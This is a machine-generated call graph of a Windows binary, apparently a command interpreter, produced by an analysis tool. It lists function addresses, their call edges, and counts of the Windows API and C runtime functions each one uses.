20656->20657 20658 5f776 20657->20658 20665 533eb 20657->20665 20659 68959 449 API calls 20658->20659 20660 5f77b 20659->20660 20661 4cc70 549 API calls 20661->20665 20663 53457 20665->20660 20665->20661 20665->20663 20667 4dd20 448 API calls 20665->20667 20668 4dcd0 448 API calls 20665->20668 20669 5f78c 20665->20669 20667->20665 20668->20665 20676 4a82f 20675->20676 20677 49943 20675->20677 20676->20677 20678 69a0e 449 API calls 20676->20678 20677->20649 20679 5c971 20678->20679 20679->20677 20680 463bd 448 API calls 20679->20680 20682 5c982 20680->20682 20682->20677 20686 4d613 20685->20686 20687 4d660 533 API calls 20686->20687 20689 4d627 20686->20689 20688 580cd 20687->20688 20688->20465 20689->20465 20691 4dcd0 448 API calls 20690->20691 20692 4da45 20691->20692 20693 5d948 memset longjmp 20692->20693 20707 4da52 20692->20707 20694 4da81 20693->20694 20694->20326 20695 4dad3 20696 4daf1 20695->20696 20697 5d9ad 20695->20697 20698 4dc60 2 API calls 20696->20698 20700 478e4 448 API calls 20697->20700 20699 4daf6 20698->20699 20699->20326 20702 5d9a8 20700->20702 20703 4dc60 2 API calls 20702->20703 20705 5d9cc longjmp 20703->20705 20706 5d9da 20705->20706 20708 478e4 448 API calls 20706->20708 20707->20694 20707->20695 20707->20697 20710 5d97b memcpy 20707->20710 20759 4ee03 20707->20759 20810 4bf70 20707->20810 20709 5d9e3 20708->20709 20709->20326 20711 478e4 448 API calls 20710->20711 20711->20702 20713 676fd 20712->20713 20714 67728 20712->20714 20716 463bd 448 API calls 20713->20716 20715 67d26 20714->20715 20718 67746 20714->20718 20721 49950 448 API calls 20714->20721 20719 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20715->20719 20717 67708 EnterCriticalSection LeaveCriticalSection 20716->20717 20717->20714 20722 4ec2e 448 API calls 20718->20722 20724 67750 20718->20724 20720 67d3d 20719->20720 20720->20320 20721->20718 20722->20724 20723 48e9e 448 API calls 20725 677ad 20723->20725 20724->20723 20864 67654 20725->20864 20728 67c99 20729 49abf _vsnwprintf 20728->20729 20730 67cba 20729->20730 20732 4998d 448 API calls 20730->20732 20731 678b8 towupper 20740 677fa 20731->20740 20733 67cfe 20732->20733 20733->20715 20734 67d07 EnterCriticalSection LeaveCriticalSection 20733->20734 20734->20715 20735 49310 448 API calls 20735->20740 20736 46854 448 API calls 20736->20740 20737 44d08 5 API calls 20737->20740 20738 67afc GetDriveTypeW 20738->20740 20740->20730 20740->20731 20740->20735 20740->20736 20740->20737 20740->20738 20741 572ef ApiSetQueryApiSetPresence 20740->20741 20742 49abf _vsnwprintf 20740->20742 20744 49abf _vsnwprintf 20740->20744 20868 5640a FormatMessageW 20740->20868 20741->20740 20743 679ed LocalFree 20742->20743 20743->20740 20744->20740 20745->20325 20747 64799 448 API calls 20746->20747 20748 6763c 20747->20748 20749 67649 GetLastError 20748->20749 20750 67645 20748->20750 20749->20750 20750->20340 20752 6a0ef GetStdHandle 20751->20752 20753 64799 448 API calls 20752->20753 20754 6a110 20753->20754 20755 6a114 wcschr 20754->20755 20756 6a129 20754->20756 20755->20752 20755->20756 20757 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20756->20757 20758 6a133 20757->20758 20758->20383 20760 4ee52 20759->20760 20761 4ee4c 20759->20761 20763 4ee5a wcsrchr 20760->20763 20766 4ee68 20760->20766 20761->20760 20762 4eea7 20761->20762 20764 5de31 20762->20764 20765 51a05 5 API calls 20762->20765 20763->20766 20764->20766 20768 5df50 longjmp 20764->20768 20770 5de49 ??_V@YAXPAX 20764->20770 20784 5decb 20764->20784 20771 4eed8 20765->20771 20767 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20766->20767 20769 4ee88 20767->20769 20768->20764 20769->20707 20770->20766 20771->20764 20771->20770 20772 4ef09 towlower wcsrchr 20771->20772 20773 4ef50 wcsrchr 20771->20773 20774 5de80 wcschr 20771->20774 20779 5df01 20771->20779 20782 4acb0 448 API calls 20771->20782 20783 4efed 20771->20783 20787 4efe6 20771->20787 20790 4f009 GetFullPathNameW 20771->20790 20793 5df72 SearchPathW 20771->20793 20794 50207 10 API calls 20771->20794 20796 5dfb9 wcsrchr 20771->20796 20797 4f067 memset 20771->20797 20799 5dff6 GetFileAttributesExW 20771->20799 20800 4f18a 20771->20800 20801 5e07c FileTimeToSystemTime 20771->20801 20806 46854 448 API calls 20771->20806 20808 4f164 wcsrchr 20771->20808 20809 49310 448 API calls 20771->20809 20846 6b325 20771->20846 20772->20771 20776 4f1dd wcsrchr 20772->20776 20773->20771 20777 4ef67 wcsrchr 20773->20777 20775 5de9e 20774->20775 20774->20779 20780 4dcd0 448 API calls 20775->20780 20776->20771 20778 4f1f7 towlower 20776->20778 20777->20771 20777->20779 20778->20771 20779->20770 20781 478e4 448 API calls 20779->20781 20785 5deb5 20780->20785 20781->20764 20782->20771 20783->20766 20786 4efef ??_V@YAXPAX 20783->20786 20784->20770 20785->20764 20833 51d90 20785->20833 20786->20766 20789 4acb0 448 API calls 20787->20789 20789->20783 20790->20771 20792 4dc60 2 API calls 20792->20779 20793->20771 20795 4f03d wcsrchr 20794->20795 20795->20771 20795->20796 20796->20771 20798 4e3f0 17 API calls 20797->20798 20798->20771 20799->20771 20802 4acb0 448 API calls 20800->20802 20804 5e271 20800->20804 20801->20771 20803 4f1ba 20802->20803 20803->20783 20805 4f1c8 ??_V@YAXPAX 20803->20805 20805->20783 20806->20771 20808->20771 20808->20804 20809->20771 20811 4dcd0 448 API calls 20810->20811 20814 4bfc8 20811->20814 20812 5cfad longjmp 20817 4c02c 20812->20817 20813 5cfc1 longjmp 20813->20817 20815 4dcd0 448 API calls 20814->20815 20814->20817 20819 4c155 20814->20819 20815->20817 20816 4ec2e 448 API calls 20816->20817 20817->20812 20817->20813 20817->20816 20818 4c0bf 20817->20818 20817->20819 20821 4c111 20817->20821 20822 4c1ef wcstol 20817->20822 20830 4c26d 20817->20830 20859 4c3f4 20818->20859 20819->20818 20819->20819 20825 5d042 memcpy 20819->20825 20826 4c333 memcpy 20819->20826 20829 4c1b2 _wcsnicmp 20819->20829 20821->20819 20824 5d029 20821->20824 20822->20817 20827 478e4 448 API calls 20824->20827 20828 5d063 20825->20828 20826->20829 20831 5d036 longjmp 20827->20831 20829->20819 20830->20819 20832 4c27d wcstol 20830->20832 20831->20825 20832->20819 20834 51da8 20833->20834 20844 51e5a 20833->20844 20834->20844 20854 4ab7f 20834->20854 20837 4acb0 448 API calls 20838 51dc2 20837->20838 20839 501f5 wcsrchr 20838->20839 20845 51dd1 20839->20845 20840 5f106 20841 51e4a 20843 4dc60 2 API calls 20841->20843 20842 51e11 _wcsnicmp 20842->20845 20843->20844 20844->20792 20845->20840 20845->20841 20845->20842 20845->20845 20849 6b35b __aulldvrm 20846->20849 20847 6b42e 20848 6b445 wcsncmp 20847->20848 20851 6b432 20847->20851 20848->20851 20849->20847 20850 6b3f4 memmove 20849->20850 20850->20849 20852 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20851->20852 20853 6b4f8 20852->20853 20853->20771 20855 4abaa 20854->20855 20858 4ab88 20854->20858 20855->20837 20856 4ab89 iswspace 20857 4ab98 wcschr 20856->20857 20856->20858 20857->20855 20857->20858 20858->20855 20858->20856 20858->20857 20860 4dc60 2 API calls 20859->20860 20861 4c3fb 20860->20861 20862 4dc60 2 API calls 20861->20862 20863 4c0df 20862->20863 20863->20707 20865 67679 20864->20865 20866 67660 20864->20866 20865->20715 20865->20728 20865->20740 20867 56e25 4 API calls 20866->20867 20867->20865 20868->20740 20870 68727 20869->20870 20875 68781 20869->20875 20871 4998d 448 API calls 20870->20871 20873 68736 20871->20873 20872 49950 448 API calls 20872->20873 20873->20872 20874 4998d 448 API calls 20873->20874 20873->20875 20874->20873 20877 49950 448 API calls 20876->20877 20878 686f9 20877->20878 20879 6871d 448 API calls 20878->20879 20880 68702 20879->20880 20881 68791 448 API calls 20880->20881 20882 6870d 20881->20882 20883 68791 448 API calls 20882->20883 20884 68718 20883->20884 20884->20291 20886 4adc6 20885->20886 20887 5cc3f 20885->20887 20888 55a2e memset 20886->20888 20889 5cc6a GetLastError 20887->20889 20892 478e4 448 API calls 20887->20892 20896 561e6 ??_V@YAXPAX 20887->20896 20890 4add1 20888->20890 20889->20887 20890->20887 20891 4e3f0 17 API calls 20890->20891 20893 4adef 20891->20893 20892->20887 20893->20887 20894 4ae05 20893->20894 20895 4b0b9 20893->20895 21136 4e950 memset 20894->21136 20898 50b12 5 API calls 20895->20898 20896->20887 20900 4b0c1 20898->20900 20900->20887 21265 47f47 memset 20900->21265 20901 4ae23 20901->20887 20906 5cc7c 20901->20906 20911 4ae44 20901->20911 20902 4b118 21279 521ee 20902->21279 20905 4b11f 21283 52940 20905->21283 20908 561e6 ??_V@YAXPAX 20906->20908 20927 4aea1 20908->20927 20909 4b0dc towupper 20910 4b100 20909->20910 20910->20902 20910->20910 20914 5cc75 20910->20914 20913 4bc30 448 API calls 20911->20913 20911->20927 20916 4ae86 20913->20916 20917 69a7d 448 API calls 20914->20917 20915 4afc2 21193 4b17b 20915->21193 20918 4ae91 20916->20918 20920 4b00e wcsncmp 20916->20920 20917->20906 20922 4a800 449 API calls 20918->20922 20918->20927 20920->20918 20920->20927 20922->20927 20923 4af6b 21165 4b1b0 20923->21165 20924 561e6 ??_V@YAXPAX 20926 4afe8 20924->20926 20929 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20926->20929 20927->20887 20927->20923 20927->20927 20931 4aecb wcschr 20927->20931 20940 4b13b 20927->20940 20941 4b176 20927->20941 20933 4b002 20929->20933 20930 50b12 5 API calls 20930->20940 20931->20927 20950 4b033 20931->20950 20932 4af83 20934 4afc4 20932->20934 20935 4af99 20932->20935 20933->18657 21187 4aa50 20934->21187 20937 4afa5 20935->20937 20938 4b02c 20935->20938 20942 4afb1 20937->20942 20943 4b085 20937->20943 21197 4c6c0 20938->21197 20940->20927 20940->20930 20940->20941 20951 47f47 23 API calls 20940->20951 20955 5ccc9 GetLastError 20940->20955 20945 478e4 448 API calls 20941->20945 20947 4b0a2 20942->20947 20948 4afbd 20942->20948 21250 49dc0 20943->21250 20945->20887 20947->20905 20952 4b0aa 20947->20952 21184 49770 20948->21184 20949 4b031 20949->20915 20950->20943 20954 4b193 20950->20954 20951->20940 21169 459a0 20952->21169 20956 56c78 4 API calls 20954->20956 20955->20941 20956->20941 20959 4e683 20958->20959 20971 4e6c6 20958->20971 20960 4e689 20959->20960 20962 4e71d 20959->20962 20968 4e733 20959->20968 20969 4e6ec 20959->20969 20959->20971 22131 4e790 20960->22131 20967 4e790 457 API calls 20962->20967 20964 4e790 457 API calls 20970 4e6ad 20964->20970 20965 4e790 457 API calls 20965->20971 20966 4e790 457 API calls 20966->20969 20967->20968 20968->20965 20968->20971 20969->20966 20969->20971 20970->20971 20972 4e790 457 API calls 20970->20972 20971->18626 20972->20970 20975 503cb 20973->20975 20974 503e1 20976 50416 20974->20976 20977 503f3 20974->20977 20975->20974 20978 5e7bf iswdigit 20975->20978 20981 503f8 20976->20981 22149 52960 wcstol wcstol 20976->22149 22145 515f0 20977->22145 20978->20975 20980 5e7e2 20978->20980 20983 478e4 448 API calls 20980->20983 20985 4e470 917 API calls 20981->20985 20984 5040d 20983->20984 20984->18657 20985->20984 20987 4e470 918 API calls 20986->20987 20988 4ab63 20987->20988 20989 4ab76 20988->20989 20990 4e470 918 API calls 20988->20990 20989->18657 20990->20989 20992 4e3f0 17 API calls 20991->20992 20993 49f61 20992->20993 21000 50060 5 API calls 20993->21000 21007 49fd7 20993->21007 21019 4a0d9 20993->21019 20994 4a0e7 ??_V@YAXPAX 20995 4a0ef 20994->20995 20996 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20995->20996 20998 4a0fe 20996->20998 20997 49ff4 21002 5c376 _get_osfhandle SetFilePointer 20997->21002 21005 4a02b _get_osfhandle 20997->21005 21010 5c439 20997->21010 21011 4a16c _close 20997->21011 21013 4dd98 6 API calls 20997->21013 21016 4a1d6 _dup2 20997->21016 21017 5c3d3 20997->21017 20997->21019 21020 50590 19 API calls 20997->21020 21022 5c40c 20997->21022 21024 4a11c 20997->21024 21026 5c4aa 20997->21026 22154 4a1a8 _dup 20997->22154 22156 69fcf _get_osfhandle GetFileType 20997->22156 20998->18632 20998->18644 20999 4dcd0 448 API calls 20999->20997 21000->20993 21002->20997 21003 5c392 21002->21003 21006 49abf _vsnwprintf 21003->21006 21005->20997 21008 4a03d _get_osfhandle 21005->21008 21009 5c3a9 21006->21009 21007->20997 21007->20999 21008->20997 21014 478e4 448 API calls 21009->21014 21012 49abf _vsnwprintf 21010->21012 21011->20997 21012->21009 21013->20997 21015 5c463 21014->21015 21018 4a125 2 API calls 21015->21018 21016->20997 21021 51d90 451 API calls 21017->21021 21018->21019 21019->20994 21019->20995 21020->20997 21025 5c3dd 21021->21025 21023 4a1d6 _dup2 21022->21023 21027 5c42d 21023->21027 21029 4a125 2 API calls 21024->21029 21025->21026 21032 5c3f2 SearchPathW 21025->21032 21028 4a125 2 API calls 21026->21028 21030 5c475 21027->21030 21031 5c434 21027->21031 21033 5c4af 21028->21033 21035 5c47f 21029->21035 21034 4a16c _close 21030->21034 21036 4a16c _close 21031->21036 21032->21022 21032->21026 21037 69edb 448 API calls 21033->21037 21034->21024 21038 49abf _vsnwprintf 21035->21038 21036->21010 21037->21019 21039 5c496 21038->21039 21040 478e4 448 API calls 21039->21040 21040->21019 21042 4e470 918 API calls 21041->21042 21043 503a2 21042->21043 21043->18657 21045 4dcd0 448 API calls 21044->21045 21046 50776 21045->21046 21047 5e9b9 21046->21047 21048 50792 21046->21048 21049 5089d 21046->21049 21052 4dd20 448 API calls 21048->21052 21050 4dcd0 448 API calls 21049->21050 21051 508a5 21050->21051 21053 4dcd0 448 API calls 21051->21053 21054 507b3 21052->21054 21060 507de 21053->21060 21055 5e8bd 21054->21055 21056 507bb 21054->21056 21058 4dc60 2 API calls 21055->21058 21057 4dd20 448 API calls 21056->21057 21059 507d6 21057->21059 21058->21059 21059->21060 21063 4dc60 2 API calls 21059->21063 21060->21047 21061 508c5 21060->21061 21062 50812 21060->21062 21064 4bc30 448 API calls 21061->21064 21065 50875 21062->21065 21066 50818 21062->21066 21063->21060 21067 508d2 wcstol 21064->21067 21068 5e8e7 21065->21068 21069 5087f 21065->21069 22157 50bf0 21066->22157 22272 4a7d5 21067->22272 21075 50060 5 API calls 21068->21075 21072 4bc30 448 API calls 21069->21072 21074 5088c 21072->21074 21073 508ec wcstol 21076 4a7d5 21073->21076 22221 46e57 21074->22221 21078 5e8fd GetFullPathNameW 21075->21078 21079 50906 wcstol 21076->21079 21084 5e915 21078->21084 21094 50922 21079->21094 21080 50822 21080->21047 21080->21080 21081 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21080->21081 21083 50871 21081->21083 21082 4dcd0 448 API calls 21082->21084 21083->18657 21084->21082 21085 478e4 448 API calls 21084->21085 21086 5e942 GetFullPathNameW 21084->21086 21090 5e95d 21084->21090 21085->21084 21086->21084 21087 698b5 453 API calls 21087->21094 21088 49abf _vsnwprintf 21088->21094 21089 4bc30 448 API calls 21091 5e99d 21089->21091 21090->21089 22283 63e66 21091->22283 21094->21068 21094->21087 21094->21088 21095 5198f 3 API calls 21094->21095 22274 50bbb 21094->22274 21095->21094 21097 4e5d8 21096->21097 21099 4eda4 21096->21099 21097->18648 21097->18658 21098 4edb7 _wcsicmp 21098->21097 21098->21099 21099->21097 21099->21098 21101 52090 21100->21101 21102 4dcd0 448 API calls 21101->21102 21103 520a9 21102->21103 21104 4b1b0 448 API calls 21103->21104 21129 4e613 21103->21129 21105 520ba 21104->21105 21106 4f410 464 API calls 21105->21106 21105->21129 21107 520d2 21106->21107 21108 5212f 21107->21108 21109 520d9 GetConsoleTitleW 21107->21109 21111 52134 GetConsoleTitleW 21108->21111 21112 5217a 21108->21112 21110 4ad26 450 API calls 21109->21110 21115 520f2 21110->21115 21116 4ad26 450 API calls 21111->21116 21113 52183 21112->21113 21114 5f23f 21112->21114 21120 5f24d 21113->21120 21121 5219f 21113->21121 21113->21129 21118 48bc7 448 API calls 21114->21118 22337 49458 21115->22337 21119 5214d 21116->21119 21118->21129 21123 51a47 916 API calls 21119->21123 21126 478e4 448 API calls 21120->21126 21124 478e4 448 API calls 21121->21124 21122 52107 22396 521b5 21122->22396 21127 52164 21123->21127 21124->21129 21126->21129 22399 521c1 21127->22399 21129->18657 21131 55807 21130->21131 21135 55833 21130->21135 21132 55813 _setjmp3 21131->21132 21133 55825 21132->21133 21132->21135 22500 556c4 21133->22500 21135->18655 21137 4e9b2 21136->21137 21146 4ea65 21136->21146 21138 4e3f0 17 API calls 21137->21138 21141 4e9c3 21138->21141 21139 4ea3d 21143 4ebf0 GetFileAttributesW 21139->21143 21144 4ec1e 21139->21144 21139->21146 21140 4e9f6 wcschr 21140->21139 21140->21141 21141->21139 21141->21140 21142 4ea0e wcschr 21141->21142 21141->21146 21160 4eb41 21141->21160 21142->21141 21145 4ebfc 21143->21145 21144->21143 21145->21146 21147 4ea7e _wcsicmp 21146->21147 21155 4ea99 21146->21155 21147->21146 21148 4eb7e iswspace 21149 4eac3 21148->21149 21148->21160 21150 5dd3f 21149->21150 21151 4eaf7 21149->21151 21158 4dcd0 448 API calls 21150->21158 21153 4eb05 ??_V@YAXPAX 21151->21153 21154 4eb0f 21151->21154 21152 4a62f wcschr 21152->21160 21153->21154 21156 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21154->21156 21155->21149 21155->21150 21157 4ed90 _wcsicmp 21155->21157 21159 4ae12 21156->21159 21157->21160 21161 5dd80 21158->21161 21159->20901 21159->20902 21160->21148 21160->21149 21160->21150 21160->21152 21162 69922 448 API calls 21161->21162 21164 5dd9e 21161->21164 21163 5dd91 longjmp 21162->21163 21163->21164 21166 4b1c9 21165->21166 21167 4dcd0 448 API calls 21166->21167 21168 4af78 21167->21168 21168->20932 21172 4ad26 21168->21172 21286 45ea3 memset 21169->21286 21173 4ad40 21172->21173 21174 4ad37 21172->21174 21173->20932 21174->21173 21175 4dcd0 448 API calls 21174->21175 21176 5cb7b 21175->21176 21176->21173 21177 5cb85 GetConsoleTitleW 21176->21177 21177->21173 21178 5cb9b 21177->21178 21179 4dd20 448 API calls 21178->21179 21183 5cbcd 21179->21183 21180 5cc33 21181 4dc60 2 API calls 21180->21181 21181->21173 21182 5cc2c SetConsoleTitleW 21182->21180 21183->21180 21183->21182 21352 49cc0 21184->21352 21188 4aa66 21187->21188 21189 5c9eb 21187->21189 21559 4aa75 21188->21559 21191 4aa75 489 API calls 21189->21191 21192 4aa6b 21191->21192 21192->20915 21194 4afdd 21193->21194 21195 4b185 21193->21195 21194->20924 21195->21194 21196 5ccfa SetConsoleTitleW 21195->21196 21196->21194 21198 4c709 21197->21198 21215 4c7ae 21197->21215 21198->21215 21739 4b3c1 21198->21739 21199 51cb1 450 API calls 21199->21215 21202 698b5 453 API calls 21202->21215 21203 478e4 448 API calls 21203->21215 21204 4e272 453 API calls 21205 4c732 21204->21205 21205->21215 21207 64191 448 API calls 21207->21215 21212 4c8b3 _get_osfhandle SetFilePointer 21212->21215 21216 4c8da _get_osfhandle GetFileType 21212->21216 21214 4c799 21220 4a16c _close 21214->21220 21215->21199 21215->21202 21215->21203 21215->21207 21215->21212 21215->21214 21215->21216 21218 4caa2 21215->21218 21219 5d162 memcmp 21215->21219 21228 56c78 4 API calls 21215->21228 21229 4c808 MultiByteToWideChar 21215->21229 21232 4c7b8 SetFilePointer 21215->21232 21233 5d1ce AcquireSRWLockShared ReadFile ReleaseSRWLockShared 21215->21233 21234 4c86f wcschr 21215->21234 21235 4ca03 iswspace 21215->21235 21236 4ca1e wcschr 21215->21236 21237 4caeb wcschr 21215->21237 21238 4ca49 wcschr 21215->21238 21239 5d2b3 _get_osfhandle SetFilePointer 21215->21239 21240 4cb10 iswspace 21215->21240 21241 4cb25 wcschr 21215->21241 21242 5d322 _get_osfhandle SetFilePointer 21215->21242 21243 5d302 WideCharToMultiByte 21215->21243 21244 4cb80 wcschr 21215->21244 21245 4cb50 iswspace 21215->21245 21246 4cb65 wcschr 21215->21246 21248 4cbc9 _wcsicmp 21215->21248 21249 5d3d3 WideCharToMultiByte 21215->21249 21216->21215 21217 4c901 SetFilePointer AcquireSRWLockShared ReadFile ReleaseSRWLockShared 21216->21217 21217->21215 21221 5d3fc 21218->21221 21224 4cabd _get_osfhandle SetFilePointer 21218->21224 21219->21215 21222 4ca81 21220->21222 21223 51cb1 450 API calls 21221->21223 21225 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21222->21225 21227 5d409 21223->21227 21224->20949 21226 4ca90 21225->21226 21226->20949 21230 478e4 448 API calls 21227->21230 21228->21215 21229->21215 21231 5d427 21230->21231 21232->21215 21233->21215 21234->21215 21235->21215 21235->21236 21236->21215 21237->21215 21237->21239 21238->21215 21239->21215 21239->21240 21240->21215 21240->21241 21241->21215 21242->21215 21243->21242 21247 4cb96 wcschr 21244->21247 21244->21248 21245->21215 21245->21246 21246->21215 21247->21215 21247->21248 21248->21215 21249->21215 21748 49e09 21250->21748 21253 49de1 21255 49df7 21253->21255 21258 49950 448 API calls 21253->21258 21254 5c2b9 21256 463bd 448 API calls 21254->21256 21255->20915 21257 5c2d1 21256->21257 21257->21255 21762 69fcf _get_osfhandle GetFileType 21257->21762 21258->21255 21260 5c2e5 21261 4dd98 6 API calls 21260->21261 21262 5c2e9 21260->21262 21261->21262 21262->21255 21263 478e4 448 API calls 21262->21263 21264 5c316 21263->21264 21264->21264 21266 4e3f0 17 API calls 21265->21266 21267 47fa0 21266->21267 21268 47fa4 GetDriveTypeW 21267->21268 21269 48001 21267->21269 21275 47fcf 21268->21275 21278 5b033 21268->21278 21270 48013 21269->21270 21271 4800b ??_V@YAXPAX 21269->21271 21272 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21270->21272 21271->21270 21274 48022 21272->21274 21273 5b05a ??_V@YAXPAX 21273->21270 21274->20889 21274->20909 21275->21269 21276 47fe0 GetVolumeInformationW 21275->21276 21276->21269 21277 5b040 GetLastError 21276->21277 21277->21269 21277->21278 21278->21270 21278->21273 21281 52200 21279->21281 21280 52229 21280->20905 21281->21280 21281->21281 21282 52081 918 API calls 21281->21282 21282->21280 21763 526dc memset 21283->21763 21287 4e3f0 17 API calls 21286->21287 21288 45f21 21287->21288 21289 59d02 21288->21289 21290 59d0f 21288->21290 21291 48e9e 448 API calls 21288->21291 21290->21289 21353 49cd3 21352->21353 21377 49780 21352->21377 21354 4dcd0 448 API calls 21353->21354 21355 49cdd 21354->21355 21356 4a62f wcschr 21355->21356 21355->21377 21377->20915 21560 5ca49 21559->21560 21563 4aa90 21559->21563 21561 4bc30 448 API calls 21560->21561 21579 5ca70 21560->21579 21653 65166 21560->21653 21561->21560 21563->21560 21564 4aacb _wcsnicmp 21563->21564 21565 4ab3d 21564->21565 21566 4aadf _wcsnicmp 21564->21566 21584 53326 21565->21584 21567 5c9fd 21566->21567 21573 4aaf7 21566->21573 21616 653aa 21567->21616 21571 4ab0f 21575 4ab1b wcschr 21571->21575 21583 5cad1 21571->21583 21572 478e4 448 API calls 21576 5cb08 21572->21576 21573->21571 21574 5ca2d wcsrchr 21573->21574 21573->21583 21574->21571 21577 4ab47 21575->21577 21578 4ab29 21575->21578 21582 50060 5 API calls 21579->21582 21579->21583 21582->21583 21583->21572 21585 5333b 21584->21585 21594 533ab 21584->21594 21587 50060 5 API calls 21585->21587 21585->21594 21586 478e4 448 API calls 21588 5f76c 21586->21588 21589 53349 21587->21589 21594->21586 21617 4acb0 448 API calls 21616->21617 21654 6516f 21653->21654 21658 65190 21653->21658 21738 5727b __iob_func 21654->21738 21656 65180 fprintf 21656->21560 21657 651dd 21657->21560 21658->21657 21659 49950 448 API calls 21658->21659 21659->21658 21738->21656 21740 4ab7f 2 API calls 21739->21740 21741 4b3d3 21740->21741 21742 4ab7f 2 API calls 21741->21742 21746 4b3eb 21741->21746 21742->21746 21743 4b3f6 wcschr 21744 4b408 wcschr 21743->21744 21745 4b440 21743->21745 21744->21745 21744->21746 21745->21204 21746->21743 21746->21744 21746->21745 21747 4a62f wcschr 21746->21747 21747->21746 21749 49e14 21748->21749 21758 49dd5 21748->21758 21750 49e8e iswspace 21749->21750 21753 49e19 21750->21753 21751 49e27 iswspace 21752 49e40 21751->21752 21751->21753 21754 49e8e iswspace 21752->21754 21753->21751 21753->21752 21753->21758 21755 49e47 21754->21755 21756 49e62 21755->21756 21757 5c31b _wcsnicmp 21755->21757 21755->21758 21759 49e71 _wcsnicmp 21756->21759 21760 49e67 21756->21760 21757->21758 21757->21760 21758->21253 21758->21254 21759->21758 21759->21760 21760->21758 21761 478e4 448 API calls 21760->21761 21761->21758 21762->21260 21764 4e3f0 17 API calls 21763->21764 21765 527be 21764->21765 21766 528f8 21765->21766 21767 527c8 memset GetEnvironmentVariableW 21765->21767 21768 52912 21766->21768 21769 5290a ??_V@YAXPAX 21766->21769 21770 4e3f0 17 API calls 21767->21770 21771 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21768->21771 21769->21768 21774 52830 21770->21774 21772 52925 21771->21772 21772->20915 21773 528e2 21773->21766 21775 5f431 ??_V@YAXPAX 21773->21775 21774->21773 21776 5284a GetEnvironmentVariableW 21774->21776 21775->21766 21777 52865 21776->21777 21778 5f3b2 21776->21778 21794 49144 21777->21794 21780 49144 448 API calls 21778->21780 21781 5f3cd 21780->21781 21781->21777 21783 478e4 448 API calls 21781->21783 21782 52872 21782->21773 21784 48e9e 448 API calls 21782->21784 21786 5f3e7 21782->21786 21783->21777 21795 4bc30 446 API calls 21794->21795 21800 49172 21795->21800 21796 5b904 21796->21782 21796->21796 21797 4926f 21801 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21797->21801 21798 491a6 towupper 21798->21800 21799 5bb35 21805 4dcd0 446 API calls 21799->21805 21800->21796 21800->21797 21800->21798 21800->21799 21802 50060 5 API calls 21800->21802 21804 5bad3 21800->21804 21807 5054b 446 API calls 21800->21807 21810 5669f 446 API calls 21800->21810 21811 5ba93 21800->21811 21814 492c2 21800->21814 21817 6a37a 446 API calls 21800->21817 21802->21800 21812 463bd 446 API calls 21804->21812 21807->21800 21810->21800 21815 6a53d 446 API calls 21811->21815 21812->21797 21819 478e4 446 API calls 21814->21819 21815->21804 21817->21800 22132 4e7c6 22131->22132 22133 4e7a2 22131->22133 22136 4e697 22132->22136 22137 4dc60 2 API calls 22132->22137 22134 4e7ab wcschr 22133->22134 22133->22136 22135 4e7f4 22134->22135 22134->22136 22138 4dcd0 448 API calls 22135->22138 22136->20964 22136->20971 22137->22136 22140 4e7fe 22138->22140 22139 4e8f7 22139->22136 22143 4dd20 448 API calls 22139->22143 22144 4e83f 22139->22144 22140->22136 22140->22139 22142 4bf70 456 API calls 22140->22142 22140->22144 22141 4dc60 2 API calls 22141->22136 22142->22140 22143->22144 22144->22136 22144->22141 22146 51615 lstrcmpiW 22145->22146 22147 51606 lstrcmpW 22145->22147 22148 5160c 22146->22148 22147->22148 22148->20981 22150 52998 22149->22150 22151 529ff lstrcmpW 22150->22151 22152 52a09 lstrcmpiW 22150->22152 22153 529a0 22150->22153 22151->22153 22152->22153 22153->20981 22155 4a1bd 22154->22155 22155->20997 22156->20997 22158 5054b 448 API calls 22157->22158 22163 50c22 22158->22163 22159 50d9e 22160 4bc30 448 API calls 22159->22160 22208 50e27 22159->22208 22160->22208 22161 510ae 22161->21080 22162 4dd20 448 API calls 22165 50d6a 22162->22165 22163->22159 22166 50c93 _wcsnicmp 22163->22166 22196 4dc60 2 API calls 22163->22196 22203 5054b 448 API calls 22163->22203 22163->22208 22209 50d4a 22163->22209 22210 5118f wcstol 22163->22210 22211 5129a wcstol 22163->22211 22164 51436 CreateFileW 22167 51457 SetFilePointer SetFilePointer 22164->22167 22168 5ed11 22164->22168 22169 4dd20 448 API calls 22165->22169 22170 50cac _wcsnicmp 22166->22170 22166->22208 22173 4dcd0 448 API calls 22167->22173 22171 478e4 448 API calls 22168->22171 22179 50d81 22169->22179 22174 50cc7 _wcsnicmp 22170->22174 22182 5ebf5 22170->22182 22175 5ed1e GetLastError 22171->22175 22172 698b5 453 API calls 22172->22208 22173->22208 22180 50ce2 _wcsnicmp 22174->22180 22174->22208 22175->22161 22176 5ed00 CloseHandle 22176->22161 22177 5148a ReadFile CloseHandle 22177->22208 22178 5ec27 22183 478e4 448 API calls 22178->22183 22179->22159 22179->22178 22180->22163 22181 51131 _wcsnicmp 22180->22181 22186 51563 wcstol 22181->22186 22187 5114c _wcsnicmp 22181->22187 22189 478e4 448 API calls 22182->22189 22190 5ec33 22183->22190 22184 4dd20 448 API calls 22184->22208 22185 4dc60 GetProcessHeap RtlFreeHeap 22185->22208 22186->22182 22186->22208 22187->22163 22187->22182 22188 512d3 _wpopen 22193 5ece5 22188->22193 22194 512ff feof 22188->22194 22189->22161 22195 69922 448 API calls 22190->22195 22191 5198f 3 API calls 